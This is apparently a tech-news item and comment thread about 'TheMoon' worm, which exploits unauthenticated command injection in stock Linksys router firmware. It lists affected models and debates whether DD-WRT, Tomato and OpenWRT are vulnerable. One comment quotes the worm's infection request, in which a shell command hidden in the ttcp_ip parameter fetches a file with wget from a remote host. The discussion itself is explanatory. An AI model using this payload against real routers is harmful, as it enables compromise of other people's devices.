Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

Model Numbers of affected devices.

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900

Re: That's impossible

Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

Re:That's impossible

[Narcocide]

Only affecting models not running Linux currently...

Re:Default firmware only?

[Lothsahn]

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

Actually Belkin bought them from Cisco

[fullmetal55]

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

Re:Is dd-wrt affected?

[CreamyG31337]

no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di...